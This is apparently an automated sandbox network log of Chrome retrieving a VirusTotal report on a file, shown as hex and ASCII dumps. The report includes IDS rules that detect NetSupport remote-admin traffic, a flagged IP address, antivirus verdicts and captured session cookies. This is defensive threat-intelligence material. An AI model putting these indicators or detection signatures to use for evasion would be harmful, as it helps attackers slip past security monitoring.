                                                                                                                                                                                                                    Data Ascii: )HzZuaYU0P#RU?D:[ddG<x~G2H,<OLId`p4|;A~0dzbf}bpt^^A`p9 JJHU{`r_g4\N.!F)(@4Yer{qipNWx~XaDHkutR.\BqZF`K]g(>H*}_
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC1408INData Raw: 98 cb 89 b1 ed 9f 56 53 e0 36 b6 7d 60 16 46 4d 4c b2 b8 65 9f 42 a4 ff 2d 51 e7 6a c6 12 65 09 73 8a 2b 51 1c 77 20 ae 23 75 79 29 13 57 5b a0 eb dc f5 82 a1 1b 9f 93 bf 55 df 56 97 e7 e2 9d 32 e6 d4 26 28 2a b0 0d d7 ea 2a 8c 50 75 a4 f9 88 e7 3d 33 66 d9 f9 05 96 96 f2 b6 ca c5 25 ca 0b c8 87 f3 e8 16 1c 54 98 ae 6d aa b3 09 2a 4e ed b0 5f ca e6 36 68 22 13 b8 ad ad 0e b7 d9 ee ec ec a1 12 0b 68 1f 2a ab a0 14 36 11 e2 2b 8a 0f 96 22 55 27 f8 a9 99 05 2f f1 73 7f 7b 93 ea b1 7c 89 9f 3b 1b bb 54 c2 e5 03 7e 8a 8b ca 7b fc d2 00 e3 97 f4 73 7f 7f 13 be ac 47 f8 b9 8b d2 56 3b 42 3a 6d ba fe 9c 74 3e f9 8b 74 7e 26 d2 f9 4b c9 3f e5 fd dd c3 8a af 80 98 5f 2f e0 fe 67 69 26 52 7e 3d 9e 4c d8 2d 65 5d 52 c2 02 23 fb e6 a8 f5 33 62 45 e5 53 08 a6 40 2b d0
                                                                                                                                                                                                                    Data Ascii: VS6}`FMLeB-Qjes+Qw #uy)W[UV2&(**Pu=3f%Tm*N_6h"h*6+"U'/s{|;T~{sGV;B:mt>t~&K?_/gi&R~=L-e]R#3bES@+
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC1408INData Raw: b4 94 50 25 4d ae a4 b8 65 31 db 49 b1 3d eb 34 85 70 3f 6a 1f f0 9c 9c 73 42 e9 1d 58 b9 5f 70 a9 60 f2 d1 31 84 4b 2d 66 ba 2e 77 96 c1 c7 8f 81 4e 82 00 23 86 ae 35 1c 9a 63 87 49 89 21 02 d6 d3 a5 37 b2 53 c5 02 9c b5 c2 5c 6d 91 32 74 63 23 e3 8d b2 f4 3b 30 d8 df f5 be 2d 32 d8 ce e7 22 15 91 ee 6b 49 12 2c 8a 37 eb 04 c3 3f a2 0a 47 2e 29 ae 94 f1 64 c6 5c c4 23 1a 80 18 41 3a c5 0e 92 31 3b 37 1e d3 39 1a d1 00 e9 14 24 f1 03 b1 b1 cb 1f e3 a9 23 84 90 77 3e 57 af a9 90 f3 e4 db bb d5 ae f1 0e d5 cf 3f 17 47 74 ec 62 45 15 4c 49 b8 26 33 b5 3c 47 05 4d 17 33 2b ce 8f b4 a9 40 22 98 1d 3c d1 ce 4d 02 12 ef 90 d5 94 f9 58 4b a7 aa 9c 0f 67 f3 44 b9 0d 56 37 23 62 92 e5 22 b3 51 b7 a5 dd 31 72 39 21 1e 8f 42 76 b8 97 57 51 48 1d e5 25 e0 3c 2e f2 69
                                                                                                                                                                                                                    Data Ascii: P%Me1I=4p?jsBX_p`1K-f.wN#5cI!7S\m2tc#;0-2"kI,7?G.)d\#A:1;79$#w>W?GtbELI&3<GM3+@"<MXKgDV7#b"Q1r9!BvWQH%<.i


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    139192.168.2.164989074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC689OUTGET /gui/74552.2e8192dc6c15c665f808.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 31a8bb0975b6b843d7ef344a38b03bf3
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Wed, 24 Apr 2024 03:44:06 GMT
                                                                                                                                                                                                                    Expires: Thu, 24 Apr 2025 03:44:06 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "agGztw"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 144683
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC280INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 31 30 31 0d 0a 8b 08 00 00 00 00 00 02 ff 7c 8f 4f 6b c2 30 00 c5 ef fb 14 45 2f 09 84 68 ff 24 46 4b 77 19 0c 06 ee e2 f0 54 8a c4 18 6d 56 9b 64 49 a3 87 da ef be 6e 20 db 65 bb bd c7 e3 bd c7 6f 12 bc 8c 7c e7 94 e8 26 39 f0 f2 7c c4 57 b9 b7 5c 34 4f 75 d0 cd a5 db 05 b5 6b b9 d2 c5 3f d9 ed 56 56 10 db e0 6b 50 96 8b 8c 90 04 91 79 ca 08 4a 69 ba 48 2b d4 b3 8c c5 cb 15 d0 28 20 01 8b c7 5e 60 07 02 44 02 1f 40 40 bd b1 52 af 95 6e 5e 84 d1 2b 30 e6 66 80 f9 a8 7d 17 99 42 00 46 09 c9 20 e6 ce 99 eb d6 6e d4 a9 ee 9e 9d 69 df 3e 02 77 f2 ab 33 a0 98 c6 cb f8 cf 7d 7b 0e fe 67 1b df ed 78 72 e1 ee d7 c5 30 54 30 7f 98 cd a6 91 37 c1 09 f9 ca ad 55 fa b4 dd ac 8b 6f 28 9c c8 11 23 39 08 2a 62 22 28 25 47
                                                                                                                                                                                                                    Data Ascii: 00000001000101|Ok0E/h$FKwTmVdIn eo|&9|W\4Ouk?VVkPyJiH+( ^`D@@Rn^+0f}BF ni>w3}{gxr0T07Uo(#9*b"(%G
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    140192.168.2.164989174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC962OUTPOST /ui/intelligence/rules_matching_iocs HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Content-Length: 89
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTc0MjQzMzE3NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ1NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC89OUTData Raw: 5b 7b 22 69 64 22 3a 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 22 74 79 70 65 22 3a 22 66 69 6c 65 22 7d 5d
                                                                                                                                                                                                                    Data Ascii: [{"id":"76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358","type":"file"}]
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC806INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a610f2755704486b7f72963054293475
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 116
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC116INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "AuthenticationRequiredError", "message": "Authentication required" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    141192.168.2.164989274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC943OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQyNTY3OTQ4NDItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ1NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a52a9ff838c5598bae5e6d1586d36a6b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 35840
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c4178
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 22 70 6f 77 65 72 73 68 65 6c 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 6f 70 75 6c 61 72 5f 74 68 72 65 61 74 5f 63 61 74 65 67 6f 72 79 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: { "count": 4, "value": "powershell" } ], "popular_threat_category": [ { "count": 5,
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC550INData Raw: 3a 74 6f 5f 63 6c 69 65 6e 74 2c 65 73 74 61 62 6c 69 73 68 65 64 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 53 65 72 76 65 72 3a 20 4e 65 74 53 75 70 70 6f 72 74 20 5c 22 2c 66 61 73 74 5f 70 61 74 74 65 72 6e 2c 6e 6f 63 61 73 65 3b 20 63 6f 6e 74 65 6e 74 3a 5c 22 43 4d 44 3d 5c 22 3b 20 6d 65 74 61 64 61 74 61 3a 69 6d 70 61 63 74 5f 66 6c 61 67 20 72 65 64 3b 20 73 65 72 76 69 63 65 3a 68 74 74 70 3b 20 72 65 66 65 72 65 6e 63 65 3a 75 72 6c 2c 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 67 75 69 2f 66 69 6c 65 2f 33 34 65 65 35 61 65 61 62 34 38 33 30 34 33 33 66 66 39 38 37 32 38 38 39 39 64 32 39 62 35 65 39 66 35 63 34 64 33 64 38 61 38 35 65 66 33 38 63 35 34 64 34 36 34 39 33 32 37 33 32 39 34 63 2f 64 65 74 65 63 74 69 6f 6e 3b 20 63 6c
                                                                                                                                                                                                                    Data Ascii: :to_client,established; content:\"Server: NetSupport \",fast_pattern,nocase; content:\"CMD=\"; metadata:impact_flag red; service:http; reference:url,www.virustotal.com/gui/file/34ee5aeab4830433ff98728899d29b5e9f5c4d3d8a85ef38c54d46493273294c/detection; cl
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 69 70 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 70 6f 72 74 22 3a 20 34 34 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 50 6f 74 65 6e 74 69 61 6c 6c 79 20 42 61 64 20 54 72
                                                                                                                                                                                                                    Data Ascii: { "src_ip": "5.8.63.140", "src_port": 443 } ] }, { "rule_category": "Potentially Bad Tr
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 73 65 76 65 72 69 74 79 22 3a 20 22 6c 6f 77 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 6d 73 67 22 3a 20 22 45 54 20 49 4e 46 4f 20 4e 65 74 53 75 70 70 6f 72 74 20 52 65 6d 6f 74 65 20 41 64 6d 69 6e 20 43 68 65 63 6b 69 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 69 64 22 3a 20 22 31 3a 32 30 33 35 38 39 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 73 6f 75 72 63 65 22 3a 20 22 50 72 6f 6f 66 70 6f 69 6e 74 20 45 6d 65 72 67 69 6e 67 20 54 68 72 65 61 74 73 20 4f 70 65 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65
                                                                                                                                                                                                                    Data Ascii: "alert_severity": "low", "rule_msg": "ET INFO NetSupport Remote Admin Checkin", "rule_id": "1:2035892", "rule_source": "Proofpoint Emerging Threats Open", "rule
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 4d 69 73 63 20 61 63 74 69 76 69 74 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 73 65 76 65 72 69 74 79 22 3a 20 22 6c 6f 77 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 6d 73 67 22 3a 20 22 45 54 20 49 4e 46 4f 20 4e 65 74 53 75 70 70 6f 72 74 20 52 65 6d 6f 74 65 20 41 64 6d 69 6e 20 52 65 73 70 6f 6e 73 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 69 64 22 3a 20 22 31 3a 32 30 33 35 38 39 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 73 6f 75 72 63 65 22 3a 20 22 50 72 6f 6f 66
                                                                                                                                                                                                                    Data Ascii: "rule_category": "Misc activity", "alert_severity": "low", "rule_msg": "ET INFO NetSupport Remote Admin Response", "rule_id": "1:2035895", "rule_source": "Proof
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 50 6f 74 65 6e 74 69 61 6c 20 43 6f 72 70 6f 72 61 74 65 20 50 72 69 76 61 63 79 20 56 69 6f 6c 61 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "src_port": 443, "hostname": "5.8.63.140" } ] }, { "rule_category": "Potential Corporate Privacy Violation",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 2e 36 37 2e 36 38 2e 32 31 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 70 6f 72 74 22 3a 20 38 30 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 67 65 6f 2e 6e 65 74 73 75 70 70 6f 72 74 73 6f 66 74 77 61 72 65 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 3a 2f 2f 67 65 6f 2e 6e 65 74 73 75 70 70 6f 72 74 73 6f 66 74 77 61 72 65 2e 63 6f 6d 2f 6c 6f 63 61 74 69 6f 6e 2f 6c 6f 63 61 2e 61 73 70 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: .67.68.212", "dest_port": 80, "hostname": "geo.netsupportsoftware.com", "url": "http://geo.netsupportsoftware.com/location/loca.asp" }
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 22 43 4d 43 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 4d 43 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 32 2e 34 2e 32 30 32 32 2e 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "CMC": { "method": "blacklist", "engine_name": "CMC", "engine_version": "2.4.2022.1", "engine_update": "20240423", "category": "undetected",
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC1408INData Raw: 20 20 22 65 6e 67 69 6e 65 5f 76 65 72 73 69 6f 6e 22 3a 20 22 34 2e 35 2e 35 2e 35 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 75 70 64 61 74 65 22 3a 20 22 32 30 32 34 30 34 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 6e 75 6c 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5a 69 6c 6c 79 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_version": "4.5.5.54", "engine_update": "20240425", "category": "undetected", "result": null }, "Zillya": { "method": "blacklist",


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    142192.168.2.164989574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
